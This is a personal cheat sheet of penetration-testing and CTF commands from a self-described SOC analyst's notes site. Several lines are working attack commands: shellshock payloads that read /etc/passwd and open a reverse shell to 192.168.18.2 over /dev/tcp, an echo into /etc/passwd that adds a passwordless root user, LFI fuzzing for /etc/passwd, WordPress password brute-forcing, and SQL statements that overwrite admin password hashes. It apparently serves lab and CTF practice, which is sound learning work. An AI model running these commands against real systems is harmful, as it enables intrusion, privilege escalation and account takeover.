Persecure : my learning archive

My Notes

Hello! I’m a SOC analyst and cybersecurity enthusiast. In my free time, I enjoy practicing on CTFs and writing up about them.

Enumeration

Search for nmap scripts

RPC

Locate setuid binaries

Web directory enum

mysqldump

SMB Enum

ffuf

wpscan

curl

Tools

Steganography tools

Windows exploit suggester

Linux

Base64 decoder

Start a Python server

Transfering file with netcat

tee

Bypass restricted shell

Exploits

shellshock

MYSQL

Linux

Base64 decoder 

echo 'SGVsbG8gV29ybGQg' | base64 -d

Start a Python server

python3 -m http.server 81

Transfer files with netcat

Sending machine

nc <IP> *PORT* < *FILE*

Receiving machine

nc -lvnp *PORT* > *NEW FILE NAME*

tee

Add user with root access

echo "persecure::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

Bypass restricted shell

https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/

Enumeration

Search for nmap scripts

ls -la /usr/share/nmap/scripts | grep -e "<SEARCH>"

Gobuster web directory enum

Gobuster dir -u <ADDRESS> / -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html,.config,.sh -f

RPC

CommandDescription
showmount -a <IP ADDRESS>show mount information for an NFS server
rpcinfo -p <IP ADDRESS>Report RPC information

Locate setuid binaries 

find /usr/bin/ -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

mysqldump

mysqldump -u <USER> -p<PASSWORD> <DATABASE> users

SMB Enumeration

nmblookup -A <IP>
smbmap -H <IP>
echo exit | smbclient -L \\<IP>
nmap --script smb-enum-shares -p 139,445 <IP>
smbclient \\[ip]\\[share name]
nmap --script smb-vuln* -p 139,445 <IP>

ffuf

ffuf -c -r -u 'http://192.168.18.12/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0

Wpscan

wpscan --url <URL> --enumerate p --enumerate t --enumerate u
wpscan --url <URL> -U users -P wordlists.txt

Curl

Bypass user agent as search engine

curl --user-agent "Googlebot/2.1 (+http://www.google.com/bot.html)" -v $@ <HTTP>

Tools

Steganography tools

steghide extract <IMAGE>
steghide extract -sf <IMAGE>

Crack passphrase 

stegcracker <IMAGE> /usr/share/wordlists/rockyou.txt

Windows exploit suggester

Download script here

It requires the ‘systeminfo’ command output from a Windows host

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Exploits

Shellshock

Scan for shellshock vulnerability

nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

Test for shellshock vulnerability

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.18.12:80/cgi-bin/test.sh

Reverse Shell

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.18.2/1234 0>&1'" http://192.168.18.12/cgi-bin/test.sh

MYSQL

Password hash update

UPDATE wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" WHERE ID=1;

Password hash update 2

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'persecure'))) where username = 'admin';